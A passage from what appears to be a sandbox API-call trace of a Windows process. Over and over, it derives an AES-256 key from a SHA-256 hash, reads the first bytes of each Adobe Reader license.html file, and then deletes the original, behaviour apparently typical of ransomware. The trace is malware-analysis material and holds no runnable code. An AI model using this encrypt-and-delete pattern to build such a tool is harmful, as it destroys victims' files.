phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.104] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd11a [0203.104] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.139] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.139] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.139] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.140] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CAT\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cat\\license.html")) returned 1 [0203.142] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.143] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.144] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.144] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.144] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.144] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x12dac [0203.144] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.181] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.181] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.181] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.182] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHS\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\chs\\license.html")) returned 1 [0203.185] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.185] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.186] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.186] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.186] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.186] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x13a5b [0203.186] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.220] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.220] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.220] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.221] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CHT\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cht\\license.html")) returned 1 [0203.235] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.236] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.236] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.236] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.236] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.236] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x112b7 [0203.236] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.259] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.259] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.259] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.261] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\CZE\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\cze\\license.html")) returned 1 [0203.263] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.264] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.264] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.264] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.264] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.264] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbd79 [0203.264] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.284] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.284] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.284] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.285] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DAN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\dan\\license.html")) returned 1 [0203.286] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.286] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.287] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.287] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.287] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.287] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc750 [0203.287] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.313] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.313] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.313] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.314] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\DEU\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\deu\\license.html")) returned 1 [0203.350] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.351] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.351] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.351] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.351] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.351] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa835 [0203.351] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.411] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.412] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.412] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.412] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ENU\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\enu\\license.html")) returned 1 [0203.414] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.415] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.415] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.415] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.415] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.415] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcd60 [0203.415] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.447] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.447] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.447] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.448] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ESP\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\esp\\license.html")) returned 1 [0203.449] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.449] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.450] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.450] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.450] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.450] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xaedb [0203.450] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.455] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.455] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.455] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.456] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\license.html")) returned 1 [0203.458] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.458] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.459] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.459] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.459] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.459] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xe94c [0203.459] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.474] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.474] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.474] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.475] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\FRA\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\fra\\license.html")) returned 1 [0203.476] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.477] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.478] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.478] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.478] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.478] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc490 [0203.478] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.483] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.483] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.483] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.484] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HRV\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hrv\\license.html")) returned 1 [0203.485] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.485] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.486] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.486] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.486] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.486] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x11ef3 [0203.486] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.493] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.493] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.494] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.495] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\license.html")) returned 1 [0203.497] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.497] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.498] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.498] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.498] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.498] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc60d [0203.498] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.503] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.503] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.503] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.504] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\ITA\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\ita\\license.html")) returned 1 [0203.508] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.508] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.509] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.509] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.509] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.509] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1dc34 [0203.509] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.579] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.579] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.579] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.580] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\license.html")) returned 1 [0203.622] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.622] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.623] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.623] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.623] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.623] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x18e95 [0203.623] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.642] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.642] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.642] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.643] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\KOR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\kor\\license.html")) returned 1 [0203.645] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.645] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.646] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.646] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.646] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.646] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc288 [0203.646] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.652] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.652] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.652] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.653] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NLD\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nld\\license.html")) returned 1 [0203.654] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.655] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.655] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.655] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.655] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.655] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xba2a [0203.655] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.660] CryptDestroyHash (hHash=0x284d668) returned 1 [0203.660] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.660] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.661] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\NOR\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\nor\\license.html")) returned 1 [0203.696] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.697] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.697] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.697] CryptHashData (hHash=0x284d5e8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.697] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d5e8, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.697] GetFileSize (in: hFile=0x610, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf0a0 [0203.697] ReadFile (in: hFile=0x610, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: lpBuffer=0x32697b4*, lpNumberOfBytesRead=0x3269744*=0x80, lpOverlapped=0x0) returned 1 [0203.738] CryptDestroyHash (hHash=0x284d5e8) returned 1 [0203.738] CryptDestroyKey (hKey=0x284d628) returned 1 [0203.738] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0203.739] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\POL\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\pol\\license.html")) returned 1 [0203.778] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0203.779] CryptAcquireContextW (in: phProv=0x326973c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326973c*=0xa52810) returned 1 [0203.779] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x3269740 | out: phHash=0x3269740) returned 1 [0203.779] CryptHashData (hHash=0x284d668, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0203.779] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x3269734 | out: phKey=0x3269734*=0x284d628) returned 1 [0203.779] GetFileSize (in: hFile=0x5c0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd746 [0203.779] ReadFile (in: hFile=0x5c0, lpBuffer=0x32697b4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x3269744, lpOverlapped=0x0 | out: 